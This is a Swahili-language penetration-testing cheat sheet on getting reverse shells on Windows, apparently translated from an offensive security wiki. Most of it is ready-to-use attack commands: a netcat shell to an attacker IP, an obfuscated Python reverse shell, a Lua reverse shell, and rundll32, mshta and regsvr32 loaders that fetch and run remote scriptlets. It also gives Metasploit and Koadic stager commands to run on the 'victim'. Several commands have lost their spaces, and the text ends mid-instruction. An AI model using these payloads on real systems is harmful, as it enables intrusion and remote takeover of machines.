Ukurasa lolbas-project.github.io ni kwa ajili ya Windows kama https://gtfobins.github.io/ ni kwa ajili ya linux.
Kwa dhahiri, hakuna faili za SUID au mamlaka ya sudo kwenye Windows, lakini ni muhimu kujua jinsi baadhi ya binari zinavyoweza kutumika kufanya aina fulani ya vitendo visivyotarajiwa kama utekelezaji wa nambari za kubahatisha.
NC
nc.exe-ecmd.exe<Attacker_IP><PORT>
SBD
sbd ni mbadala wa Netcat uliounganifu na salama. Inafanya kazi kwenye mifumo inayofanana na Unix na Win32. Ikiwa na sifa kama encryption imara, utekelezaji wa programu, bandari za chanzo zinazoweza kubadilishwa, na uunganisho endelevu, sbd hutoa suluhisho la kipekee kwa mawasiliano ya TCP/IP. Kwa watumiaji wa Windows, toleo la sbd.exe kutoka usambazaji wa Kali Linux linaweza kutumika kama mbadala thabiti wa Netcat.
#WindowsC:\Python27\python.exe -c "(lambda __y, __g, __contextlib: [[[[[[[(s.connect(('10.11.0.37', 4444)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type('except', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type('try', (), {'__enter__': lambda self: None, '__exit__': lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g['p2s_thread'] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g['s2p_thread'] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g['p'] in [(subprocess.Popen(['\\windows\\system32\\cmd.exe'], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g['s'] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g['p2s'], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l['s'].send(__l['p'].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 'p2s')]][0] for __g['s2p'], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l['p'].stdin.write(__l['data']), __after())[1] if (len(__l['data']) > 0) else __after())(lambda: __this()) for __l['data'] in [(__l['s'].recv(1024))]][0] if True else __after())())(lambda: None) for __l['s'], __l['p'] in [(s, p)]][0])({}), 's2p')]][0] for __g['os'] in [(__import__('os', __g, __g))]][0] for __g['socket'] in [(__import__('socket', __g, __g))]][0] for __g['subprocess'] in [(__import__('subprocess', __g, __g))]][0] for __g['threading'] in [(__import__('threading', __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__('contextlib'))"
Perl
Perl ni lugha ya programu ambayo inaweza kutumika kwa ufanisi kujenga shell kwenye mfumo wa Windows. Inatoa njia nyingi za kufanya hivyo, kama vile kutumia moduli kama vile Net::RawIP au Net::Pcap.
Lua ni lugha ya programu ya scripting iliyoundwa kwa kasi na ufanisi. Lua inaweza kutumika kama sehemu ya mchakato wa ukiukaji wa mfumo wa Windows kwa kutekeleza hati za Lua kwenye mfumo uliokaliwa. Lua inaweza kusaidia katika kuanzisha mwingiliano wa mtumiaji wa mwisho na mifumo ya Windows.
lua5.1 -e 'local host, port = "127.0.0.1", 4444 local socket = require("socket") local tcp = socket.tcp() local io = require("io") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, 'r') local s = f:read("*a") f:close() tcp:send(s) if status == "closed" then break end end tcp:close()'
OpenSSH
Mvamizi (Kali)
opensslreq-x509-newkeyrsa:4096-keyoutkey.pem-outcert.pem-days365-nodes#Generate certificateopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port>#Here you will be able to introduce the commandsopenssls_server-quiet-keykey.pem-certcert.pem-port<l_port2>#Here yo will be able to get the response
Mfano wa Shell ya Windows
Unapotumia shell ya Windows kwenye mazingira ya Windows, unaweza kutumia njia zifuatazo kusaidia kudumisha ufikiaji wako kwenye mfumo wa shabiki:
cmd.exe: Shell ya msingi ya Windows inayotumiwa kwa amri za msingi.
Powershell.exe: Shell yenye nguvu zaidi inayotumiwa kwa amri za PowerShell.
wscript.exe: Inaweza kutumika kutekeleza hati za VBScript.
cscript.exe: Inaweza kutumika kutekeleza hati za VBScript kwenye hali ya amri.
wmic.exe: Inaweza kutumika kutekeleza amri za WMI.
Mshta.exe: Inaweza kutumika kutekeleza hati za HTML Application (HTA).
rundll32.exe: Inaweza kutumika kutekeleza maktaba za DLL.
Mchakato unatekeleza wito wa mtandao: powershell.exe
Mzigo ulioandikwa kwenye diski: HAPANA (angalau mahali popote nilipoweza kupata kwa kutumia procmon!)
<?XML version="1.0"?><!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); -->
<!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --><scriptlet><public></public><scriptlanguage="JScript"><![CDATA[var r = new ActiveXObject("WScript.Shell").Run("calc.exe");]]></script></scriptlet>
Rundll32 - Metasploit
usewindows/smb/smb_deliveryrun#You will be given the command to run in the victim: rundll32.exe \\10.2.0.5\Iwvc\test.dll,0
Rundll32 - Koadic
usestager/js/rundll32_jssetSRVHOST192.168.1.107setENDPOINTsalesrun#Koadic will tell you what you need to execute inside the victim, it will be something like:rundll32.exe javascript:"\..\mshtml, RunHTMLApplication ";x=new%20ActiveXObject("Msxml2.ServerXMLHTTP.6.0");x.open("GET","http://10.2.0.5:9997/ownmG",false);x.send();eval(x.responseText);window.close();
usemulti/script/web_deliverysettarget3setpayloadwindows/meterpreter/reverse/tcpsetlhost10.2.0.5run#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll
Unaweza kupakua na kutekeleza kwa urahisi sana koadic zombie ukitumia stager regsvr
Katika folda ya Shells, kuna mabaka mengi tofauti. Ili kupakua na kutekeleza Invoke-PowerShellTcp.ps1 fanya nakala ya hati na ongeza mwishoni mwa faili: